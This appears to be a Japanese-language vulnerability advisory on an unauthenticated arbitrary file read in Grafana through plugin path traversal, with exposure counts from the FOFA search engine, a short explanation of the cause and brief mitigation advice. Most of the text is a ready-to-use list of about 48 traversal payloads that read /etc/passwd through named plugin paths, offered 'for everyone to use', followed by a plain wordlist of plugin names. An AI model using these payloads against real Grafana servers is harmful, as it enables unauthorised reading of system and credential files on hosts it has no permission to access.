1. 脆弱性の説明
Grafana は、クロスプラットフォームのオープンソース データ視覚化 Web アプリケーション プラットフォームです。ユーザーが接続されたデータ ソースを構成すると、Grafana は Web ブラウザーにデータ グラフとアラートを表示できます。
Grafana には、無許可の任意のファイル読み取りの脆弱性があり、攻撃者が認証なしでホスト上の任意のファイルを読み取ることができます。
脆弱性レベル: 高リスク
2. FOFAクエリ
3. 影響範囲
FOFA の最新データによると、ユーザーのトップ 3 は次のとおりです: 米国 (67057)、中国 (30812)、ドイツ (25397)
テストの結果、最新バージョン (Grafana v8.2.6) にはまだ脆弱性が存在します。
脆弱性の再発
fofa で見つけた IP をテストしたところ、パケットをキャプチャしてファイルの内容を読み取るためのパスを変更するだけで十分であることがわかりました。
4. 脆弱性の原因
主にプラグインが原因で、ビュー コードでは、プラグイン ディレクトリがフィルタリングせずに requestedFile と直接マージされます。より深く理解するには、 grafana の最新の任意ファイル読み取り分析と派生問題の説明をご覧ください。
5. 辞書爆破
以下は、誰もが使用できるようにネチズンによって収集されたプラグインのリストです。
/public/plugins/alertGroups/../../../../../../../../etc/passwd
/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/alertmanager/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/canvas/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashboard/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/debug/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/grafana/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/live/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mixed/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/xychart/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwdalertmanager
grafana
loki
postgres
grafana-azure-monitor-datasource
mixed
prometheus
cloudwatch
graphite
mssql
tempo
dashboard
influxdb
mysql
testdata
elasticsearch
jaeger
opentsdb
zipkin
alertGroups
bargauge
debug
graph
live
piechart
status-history
timeseries
alertlist
candlestick
gauge
heatmap
logs
pluginlist
table
welcome
annolist
canvas
geomap
histogram
news
stat
table-old
xychart
barchart
dashlist
gettingstarted
icon
nodeGraph
state-timeline
text6.修理意見
現在利用可能な詳細な解決策はありません。メーカーのホームページの更新にご注意ください: Grafana: オープン可観測性プラットフォーム | Grafana Labs
一時的な修正の提案:
1. ファイアウォールなどのセキュリティデバイスを介したアクセスポリシーを設定し、ホワイトリストアクセスを設定します。
2. 不要な場合は、公衆ネットワークからのシステムへのアクセスを禁止します。